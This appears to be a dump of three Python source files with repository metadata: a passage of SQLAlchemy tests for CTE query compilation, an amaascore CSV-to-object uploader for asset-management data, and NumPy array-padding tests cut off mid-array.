# I know, this is the PG VALUES keyword,
# we're cheating here. also yes we need the SELECT,
# sorry PG.
t = select([func.values(1).label("n")]).cte("t", recursive=True)
t = t.union_all(select([t.c.n + 1]).where(t.c.n < 100))
s = select([func.sum(t.c.n)])
self.assert_compile(s,
"WITH RECURSIVE t(n) AS "
"(SELECT values(:values_1) AS n "
"UNION ALL SELECT t.n + :n_1 AS anon_1 "
"FROM t "
"WHERE t.n < :n_2) "
"SELECT sum(t.n) AS sum_1 FROM t"
)
def test_recursive_union_no_alias_three(self):
# like test one, but let's refer to the CTE
# in a sibling CTE.
s1 = select([literal(0).label("x")])
cte = s1.cte(name="cte", recursive=True)
# can't do it here...
#bar = select([cte]).cte('bar')
cte = cte.union_all(
select([cte.c.x + 1]).where(cte.c.x < 10)
)
bar = select([cte]).cte('bar')
s2 = select([cte, bar])
self.assert_compile(s2,
"WITH RECURSIVE cte(x) AS "
"(SELECT :param_1 AS x UNION ALL "
"SELECT cte.x + :x_1 AS anon_1 "
"FROM cte WHERE cte.x < :x_2), "
"bar AS (SELECT cte.x AS x FROM cte) "
"SELECT cte.x, bar.x FROM cte, bar"
)
def test_recursive_union_no_alias_four(self):
# like test one and three, but let's refer
# previous version of "cte". here we test
# how the compiler resolves multiple instances
# of "cte".
s1 = select([literal(0).label("x")])
cte = s1.cte(name="cte", recursive=True)
bar = select([cte]).cte('bar')
cte = cte.union_all(
select([cte.c.x + 1]).where(cte.c.x < 10)
)
# outer cte rendered first, then bar, which
# includes "inner" cte
s2 = select([cte, bar])
self.assert_compile(s2,
"WITH RECURSIVE cte(x) AS "
"(SELECT :param_1 AS x UNION ALL "
"SELECT cte.x + :x_1 AS anon_1 "
"FROM cte WHERE cte.x < :x_2), "
"bar AS (SELECT cte.x AS x FROM cte) "
"SELECT cte.x, bar.x FROM cte, bar"
)
# bar rendered, only includes "inner" cte,
# "outer" cte isn't present
s2 = select([bar])
self.assert_compile(s2,
"WITH RECURSIVE cte(x) AS "
"(SELECT :param_1 AS x), "
"bar AS (SELECT cte.x AS x FROM cte) "
"SELECT bar.x FROM bar"
)
# bar rendered, but then the "outer"
# cte is rendered.
s2 = select([bar, cte])
self.assert_compile(
s2, "WITH RECURSIVE bar AS (SELECT cte.x AS x FROM cte), "
"cte(x) AS "
"(SELECT :param_1 AS x UNION ALL "
"SELECT cte.x + :x_1 AS anon_1 "
"FROM cte WHERE cte.x < :x_2) "
"SELECT bar.x, cte.x FROM bar, cte")
def test_conflicting_names(self):
"""test a flat out name conflict."""
s1 = select([1])
c1 = s1.cte(name='cte1', recursive=True)
s2 = select([1])
c2 = s2.cte(name='cte1', recursive=True)
s = select([c1, c2])
assert_raises_message(
CompileError,
"Multiple, unrelated CTEs found "
"with the same name: 'cte1'",
s.compile
)
def test_union(self):
orders = table('orders',
column('region'),
column('amount'),
)
regional_sales = select([
orders.c.region,
orders.c.amount
]).cte("regional_sales")
s = select(
[regional_sales.c.region]).where(
regional_sales.c.amount > 500
)
self.assert_compile(s,
"WITH regional_sales AS "
"(SELECT orders.region AS region, "
"orders.amount AS amount FROM orders) "
"SELECT regional_sales.region "
"FROM regional_sales WHERE "
"regional_sales.amount > :amount_1")
s = s.union_all(
select([regional_sales.c.region]).
where(
regional_sales.c.amount < 300
)
)
self.assert_compile(s,
"WITH regional_sales AS "
"(SELECT orders.region AS region, "
"orders.amount AS amount FROM orders) "
"SELECT regional_sales.region FROM regional_sales "
"WHERE regional_sales.amount > :amount_1 "
"UNION ALL SELECT regional_sales.region "
"FROM regional_sales WHERE "
"regional_sales.amount < :amount_2")
def test_reserved_quote(self):
orders = table('orders',
column('order'),
)
s = select([orders.c.order]).cte("regional_sales", recursive=True)
s = select([s.c.order])
self.assert_compile(s,
'WITH RECURSIVE regional_sales("order") AS '
'(SELECT orders."order" AS "order" '
"FROM orders)"
' SELECT regional_sales."order" '
"FROM regional_sales"
)
def test_multi_subq_quote(self):
cte = select([literal(1).label("id")]).cte(name='CTE')
s1 = select([cte.c.id]).alias()
s2 = select([cte.c.id]).alias()
s = select([s1, s2])
self.assert_compile(
s,
'WITH "CTE" AS (SELECT :param_1 AS id) '
'SELECT anon_1.id, anon_2.id FROM '
'(SELECT "CTE".id AS id FROM "CTE") AS anon_1, '
'(SELECT "CTE".id AS id FROM "CTE") AS anon_2'
)
def test_positional_binds(self):
orders = table('orders',
column('order'),
)
s = select([orders.c.order, literal("x")]).cte("regional_sales")
s = select([s.c.order, literal("y")])
dialect = default.DefaultDialect()
dialect.positional = True
dialect.paramstyle = 'numeric'
self.assert_compile(
s,
'WITH regional_sales AS (SELECT orders."order" '
'AS "order", :1 AS anon_2 FROM orders) SELECT '
'regional_sales."order", :2 AS anon_1 FROM regional_sales',
checkpositional=(
'x',
'y'),
dialect=dialect)
self.assert_compile(
s.union(s), 'WITH regional_sales AS (SELECT orders."order" '
'AS "order", :1 AS anon_2 FROM orders) SELECT '
'regional_sales."order", :2 AS anon_1 FROM regional_sales '
'UNION SELECT regional_sales."order", :3 AS anon_1 '
'FROM regional_sales', checkpositional=(
'x', 'y', 'y'), dialect=dialect)
s = select([orders.c.order]).\
where(orders.c.order == 'x').cte("regional_sales")
s = select([s.c.order]).where(s.c.order == "y")
self.assert_compile(
s, 'WITH regional_sales AS (SELECT orders."order" AS '
'"order" FROM orders WHERE orders."order" = :1) '
'SELECT regional_sales."order" FROM regional_sales '
'WHERE regional_sales."order" = :2', checkpositional=(
'x', 'y'), dialect=dialect)
def test_positional_binds_2(self):
orders = table('orders',
column('order'),
)
s = select([orders.c.order, literal("x")]).cte("regional_sales")
s = select([s.c.order, literal("y")])
dialect = default.DefaultDialect()
dialect.positional = True
dialect.paramstyle = 'numeric'
s1 = select([orders.c.order]).where(orders.c.order == 'x').\
cte("regional_sales_1")
s1a = s1.alias()
s2 = select([orders.c.order == 'y', s1a.c.order,
orders.c.order, s1.c.order]).\
where(orders.c.order == 'z').\
cte("regional_sales_2")
s3 = select([s2])
self.assert_compile(
s3,
'WITH regional_sales_1 AS (SELECT orders."order" AS "order" '
'FROM orders WHERE orders."order" = :1), regional_sales_2 AS '
'(SELECT orders."order" = :2 AS anon_1, '
'anon_2."order" AS "order", '
'orders."order" AS "order", '
'regional_sales_1."order" AS "order" FROM orders, '
'regional_sales_1 '
'AS anon_2, regional_sales_1 '
'WHERE orders."order" = :3) SELECT regional_sales_2.anon_1, '
'regional_sales_2."order" FROM regional_sales_2',
checkpositional=('x', 'y', 'z'), dialect=dialect)
def test_positional_binds_2_asliteral(self):
orders = table('orders',
column('order'),
)
s = select([orders.c.order, literal("x")]).cte("regional_sales")
s = select([s.c.order, literal("y")])
dialect = default.DefaultDialect()
dialect.positional = True
dialect.paramstyle = 'numeric'
s1 = select([orders.c.order]).where(orders.c.order == 'x').\
cte("regional_sales_1")
s1a = s1.alias()
s2 = select([orders.c.order == 'y', s1a.c.order,
orders.c.order, s1.c.order]).\
where(orders.c.order == 'z').\
cte("regional_sales_2")
s3 = select([s2])
self.assert_compile(
s3,
'WITH regional_sales_1 AS '
'(SELECT orders."order" AS "order" '
'FROM orders '
'WHERE orders."order" = \'x\'), '
'regional_sales_2 AS '
'(SELECT orders."order" = \'y\' AS anon_1, '
'anon_2."order" AS "order", orders."order" AS "order", '
'regional_sales_1."order" AS "order" '
'FROM orders, regional_sales_1 AS anon_2, regional_sales_1 '
'WHERE orders."order" = \'z\') '
'SELECT regional_sales_2.anon_1, regional_sales_2."order" '
'FROM regional_sales_2',
checkpositional=(), dialect=dialect,
literal_binds=True)
def test_all_aliases(self):
orders = table('order', column('order'))
s = select([orders.c.order]).cte("regional_sales")
r1 = s.alias()
r2 = s.alias()
s2 = select([r1, r2]).where(r1.c.order > r2.c.order)
self.assert_compile(
s2,
'WITH regional_sales AS (SELECT "order"."order" '
'AS "order" FROM "order") '
'SELECT anon_1."order", anon_2."order" '
'FROM regional_sales AS anon_1, '
'regional_sales AS anon_2 WHERE anon_1."order" > anon_2."order"'
)
s3 = select(
[orders]).select_from(
orders.join(
r1,
r1.c.order == orders.c.order))
self.assert_compile(
s3,
'WITH regional_sales AS '
'(SELECT "order"."order" AS "order" '
'FROM "order")'
' SELECT "order"."order" '
'FROM "order" JOIN regional_sales AS anon_1 '
'ON anon_1."order" = "order"."order"'
)
def test_suffixes(self):
orders = table('order', column('order'))
s = select([orders.c.order]).cte("regional_sales")
s = s.suffix_with("pg suffix", dialect='postgresql')
s = s.suffix_with('oracle suffix', dialect='oracle')
stmt = select([orders]).where(orders.c.order > s.c.order)
self.assert_compile(
stmt,
'WITH regional_sales AS (SELECT "order"."order" AS "order" '
'FROM "order") SELECT "order"."order" FROM "order", '
'regional_sales WHERE "order"."order" > regional_sales."order"'
)
self.assert_compile(
stmt,
'WITH regional_sales AS (SELECT "order"."order" AS "order" '
'FROM "order") oracle suffix SELECT "order"."order" FROM "order", '
'regional_sales WHERE "order"."order" > regional_sales."order"',
dialect='oracle'
)
self.assert_compile(
stmt,
'WITH regional_sales AS (SELECT "order"."order" AS "order" '
'FROM "order") pg suffix SELECT "order"."order" FROM "order", '
'regional_sales WHERE "order"."order" > regional_sales."order"',
dialect='postgresql'
)
| mit | 4,803,992,220,273,365,000 | 37.384615 | 80 | 0.487923 | false |
paul-rs/amaas-core-sdk-python | amaascore/csv_upload/csv_uploader.py | 1 | 4993 | import logging.config
import csv
import json
from amaascore.tools.csv_tools import csv_stream_to_objects
from amaasutils.logging_utils import DEFAULT_LOGGING
from amaascore.csv_upload.utils import process_normal, interface_direct_class, interface_direct_csvpath
from amaascore.assets.asset import Asset
from amaascore.assets.automobile import Automobile
from amaascore.assets.bond import BondCorporate, BondGovernment, BondMortgage
from amaascore.assets.bond_future import BondFuture
from amaascore.assets.bond_future_option import BondFutureOption
from amaascore.assets.bond_option import BondOption
from amaascore.assets.cfd import ContractForDifference
from amaascore.assets.currency import Currency
from amaascore.assets.custom_asset import CustomAsset
from amaascore.assets.derivative import Derivative
from amaascore.assets.energy_future import EnergyFuture
from amaascore.assets.equity import Equity
from amaascore.assets.equity_future import EquityFuture
from amaascore.assets.etf import ExchangeTradedFund
from amaascore.assets.foreign_exchange import ForeignExchange, NonDeliverableForward
from amaascore.assets.fund import Fund
from amaascore.assets.future import Future
from amaascore.assets.future_option import FutureOption
from amaascore.assets.fx_option import ForeignExchangeOption
from amaascore.assets.index import Index
from amaascore.assets.index_future import IndexFuture
from amaascore.assets.interest_rate_future import InterestRateFuture
from amaascore.assets.listed_cfd import ListedContractForDifference
from amaascore.assets.listed_derivative import ListedDerivative
from amaascore.assets.option_mixin import OptionMixin
from amaascore.assets.real_asset import RealAsset
from amaascore.assets.real_estate import RealEstate
from amaascore.assets.sukuk import Sukuk
from amaascore.assets.synthetic import Synthetic
from amaascore.assets.synthetic_from_book import SyntheticFromBook
from amaascore.assets.synthetic_multi_leg import SyntheticMultiLeg
from amaascore.assets.wine import Wine
from amaascore.assets.warrants import Warrant
from amaascore.parties.broker import Broker
from amaascore.parties.company import Company
from amaascore.parties.exchange import Exchange
from amaascore.parties.fund import Fund
from amaascore.parties.government_agency import GovernmentAgency
from amaascore.parties.individual import Individual
from amaascore.parties.organisation import Organisation
from amaascore.parties.party import Party
from amaascore.parties.sub_fund import SubFund
from amaascore.books.book import Book
from amaascore.corporate_actions.corporate_action import CorporateAction
from amaascore.corporate_actions.dividend import Dividend
from amaascore.corporate_actions.notification import Notification
from amaascore.corporate_actions.split import Split
from amaascore.market_data.eod_price import EODPrice
from amaascore.market_data.fx_rate import FXRate
from amaascore.market_data.quote import Quote
from amaascore.transactions.position import Position
from amaascore.transactions.transaction import Transaction
from amaascore.asset_managers.asset_manager import AssetManager
from amaascore.asset_managers.relationship import Relationship
class Uploader(object):
def __init__(self):
pass
@staticmethod
def json_handler(orderedDict, params):
Dict = dict(orderedDict)
for key, var in params.items():
Dict[key]=var
data_class = Dict.get('amaasclass', None)
Dict = process_normal(Dict)
obj = globals()[data_class](**dict(Dict))
return obj
@staticmethod
def upload(csvpath, asset_manager_id=None, client_id=None):
"""convert csv file rows to objects and insert;
asset_manager_id and possibly client_id from the UI (login)"""
interface = interface_direct_csvpath(csvpath)
logging.config.dictConfig(DEFAULT_LOGGING)
logger = logging.getLogger(__name__)
if asset_manager_id is None:
params = dict()
elif client_id is None:
params = {'asset_manager_id': asset_manager_id}
else:
params = {'asset_manager_id': asset_manager_id, 'client_id': client_id}
with open(csvpath) as csvfile:
objs = csv_stream_to_objects(stream=csvfile, json_handler=Uploader.json_handler, params=params)
for obj in objs:
interface.new(obj)
logger.info('Creating this object and upload to database successfully')
@staticmethod
def download(csvpath, asset_manager_id, data_id_type, data_id_list):
"""retrieve the objs mainly for test purposes"""
interface = interface_direct_csvpath(csvpath)
logging.config.dictConfig(DEFAULT_LOGGING)
logger = logging.getLogger(__name__)
objs = []
for data_id in data_id_list:
Dict = dict()
Dict[data_id_type] = data_id
objs.append(interface.retrieve(asset_manager_id=asset_manager_id, **Dict))
return objs | apache-2.0 | 5,323,224,746,094,649,000 | 42.426087 | 107 | 0.775486 | false |
jonyroda97/redbot-amigosprovaveis | lib/numpy/lib/tests/test_arraypad.py | 6 | 43701 | """Tests for the array padding functions.
"""
from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import (assert_array_equal, assert_raises, assert_allclose,
TestCase)
from numpy.lib import pad
class TestConditionalShortcuts(TestCase):
def test_zero_padding_shortcuts(self):
test = np.arange(120).reshape(4, 5, 6)
pad_amt = [(0, 0) for axis in test.shape]
modes = ['constant',
'edge',
'linear_ramp',
'maximum',
'mean',
'median',
'minimum',
'reflect',
'symmetric',
'wrap',
]
for mode in modes:
assert_array_equal(test, pad(test, pad_amt, mode=mode))
def test_shallow_statistic_range(self):
test = np.arange(120).reshape(4, 5, 6)
pad_amt = [(1, 1) for axis in test.shape]
modes = ['maximum',
'mean',
'median',
'minimum',
]
for mode in modes:
assert_array_equal(pad(test, pad_amt, mode='edge'),
pad(test, pad_amt, mode=mode, stat_length=1))
def test_clip_statistic_range(self):
test = np.arange(30).reshape(5, 6)
pad_amt = [(3, 3) for axis in test.shape]
modes = ['maximum',
'mean',
'median',
'minimum',
]
for mode in modes:
assert_array_equal(pad(test, pad_amt, mode=mode),
pad(test, pad_amt, mode=mode, stat_length=30))
class TestStatistic(TestCase):
def test_check_mean_stat_length(self):
a = np.arange(100).astype('f')
a = pad(a, ((25, 20), ), 'mean', stat_length=((2, 3), ))
b = np.array(
[0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5,
0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5,
0.5, 0.5, 0.5, 0.5, 0.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
98., 98., 98., 98., 98., 98., 98., 98., 98., 98.,
98., 98., 98., 98., 98., 98., 98., 98., 98., 98.
])
assert_array_equal(a, b)
def test_check_maximum_1(self):
a = np.arange(100)
a = pad(a, (25, 20), 'maximum')
b = np.array(
[99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99, 99, 99]
)
assert_array_equal(a, b)
def test_check_maximum_2(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'maximum')
b = np.array(
[100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
)
assert_array_equal(a, b)
def test_check_maximum_stat_length(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'maximum', stat_length=10)
b = np.array(
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100,
100, 100, 100, 100, 100, 100, 100, 100, 100, 100]
)
assert_array_equal(a, b)
def test_check_minimum_1(self):
a = np.arange(100)
a = pad(a, (25, 20), 'minimum')
b = np.array(
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
)
assert_array_equal(a, b)
def test_check_minimum_2(self):
a = np.arange(100) + 2
a = pad(a, (25, 20), 'minimum')
b = np.array(
[2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2,
2, 3, 4, 5, 6, 7, 8, 9, 10, 11,
12, 13, 14, 15, 16, 17, 18, 19, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
42, 43, 44, 45, 46, 47, 48, 49, 50, 51,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,
62, 63, 64, 65, 66, 67, 68, 69, 70, 71,
72, 73, 74, 75, 76, 77, 78, 79, 80, 81,
82, 83, 84, 85, 86, 87, 88, 89, 90, 91,
92, 93, 94, 95, 96, 97, 98, 99, 100, 101,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2]
)
assert_array_equal(a, b)
def test_check_minimum_stat_length(self):
a = np.arange(100) + 1
a = pad(a, (25, 20), 'minimum', stat_length=10)
b = np.array(
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1,
1, 2, 3, 4, 5, 6, 7, 8, 9, 10,
11, 12, 13, 14, 15, 16, 17, 18, 19, 20,
21, 22, 23, 24, 25, 26, 27, 28, 29, 30,
31, 32, 33, 34, 35, 36, 37, 38, 39, 40,
41, 42, 43, 44, 45, 46, 47, 48, 49, 50,
51, 52, 53, 54, 55, 56, 57, 58, 59, 60,
61, 62, 63, 64, 65, 66, 67, 68, 69, 70,
71, 72, 73, 74, 75, 76, 77, 78, 79, 80,
81, 82, 83, 84, 85, 86, 87, 88, 89, 90,
91, 92, 93, 94, 95, 96, 97, 98, 99, 100,
91, 91, 91, 91, 91, 91, 91, 91, 91, 91,
91, 91, 91, 91, 91, 91, 91, 91, 91, 91]
)
assert_array_equal(a, b)
def test_check_median(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'median')
b = np.array(
[49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5]
)
assert_array_equal(a, b)
def test_check_median_01(self):
a = np.array([[3, 1, 4], [4, 5, 9], [9, 8, 2]])
a = pad(a, 1, 'median')
b = np.array(
[[4, 4, 5, 4, 4],
[3, 3, 1, 4, 3],
[5, 4, 5, 9, 5],
[8, 9, 8, 2, 8],
[4, 4, 5, 4, 4]]
)
assert_array_equal(a, b)
def test_check_median_02(self):
a = np.array([[3, 1, 4], [4, 5, 9], [9, 8, 2]])
a = pad(a.T, 1, 'median').T
b = np.array(
[[5, 4, 5, 4, 5],
[3, 3, 1, 4, 3],
[5, 4, 5, 9, 5],
[8, 9, 8, 2, 8],
[5, 4, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_median_stat_length(self):
a = np.arange(100).astype('f')
a[1] = 2.
a[97] = 96.
a = pad(a, (25, 20), 'median', stat_length=(3, 5))
b = np.array(
[ 2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,
2., 2., 2., 2., 2., 2., 2., 2., 2., 2.,
2., 2., 2., 2., 2.,
0., 2., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 96., 98., 99.,
96., 96., 96., 96., 96., 96., 96., 96., 96., 96.,
96., 96., 96., 96., 96., 96., 96., 96., 96., 96.]
)
assert_array_equal(a, b)
def test_check_mean_shape_one(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'mean', stat_length=2)
b = np.array(
[[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6],
[4, 4, 4, 4, 4, 4, 5, 6, 6, 6, 6, 6, 6, 6, 6]]
)
assert_array_equal(a, b)
def test_check_mean_2(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'mean')
b = np.array(
[49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5,
0., 1., 2., 3., 4., 5., 6., 7., 8., 9.,
10., 11., 12., 13., 14., 15., 16., 17., 18., 19.,
20., 21., 22., 23., 24., 25., 26., 27., 28., 29.,
30., 31., 32., 33., 34., 35., 36., 37., 38., 39.,
40., 41., 42., 43., 44., 45., 46., 47., 48., 49.,
50., 51., 52., 53., 54., 55., 56., 57., 58., 59.,
60., 61., 62., 63., 64., 65., 66., 67., 68., 69.,
70., 71., 72., 73., 74., 75., 76., 77., 78., 79.,
80., 81., 82., 83., 84., 85., 86., 87., 88., 89.,
90., 91., 92., 93., 94., 95., 96., 97., 98., 99.,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5,
49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5, 49.5]
)
assert_array_equal(a, b)
class TestConstant(TestCase):
def test_check_constant(self):
a = np.arange(100)
a = pad(a, (25, 20), 'constant', constant_values=(10, 20))
b = np.array(
[10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20,
20, 20, 20, 20, 20, 20, 20, 20, 20, 20]
)
assert_array_equal(a, b)
def test_check_constant_zeros(self):
a = np.arange(100)
a = pad(a, (25, 20), 'constant')
b = np.array(
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
)
assert_array_equal(a, b)
def test_check_constant_float(self):
# If input array is int, but constant_values are float, the dtype of
# the array to be padded is kept
arr = np.arange(30).reshape(5, 6)
test = pad(arr, (1, 2), mode='constant',
constant_values=1.1)
expected = np.array(
[[ 1, 1, 1, 1, 1, 1, 1, 1, 1],
[ 1, 0, 1, 2, 3, 4, 5, 1, 1],
[ 1, 6, 7, 8, 9, 10, 11, 1, 1],
[ 1, 12, 13, 14, 15, 16, 17, 1, 1],
[ 1, 18, 19, 20, 21, 22, 23, 1, 1],
[ 1, 24, 25, 26, 27, 28, 29, 1, 1],
[ 1, 1, 1, 1, 1, 1, 1, 1, 1],
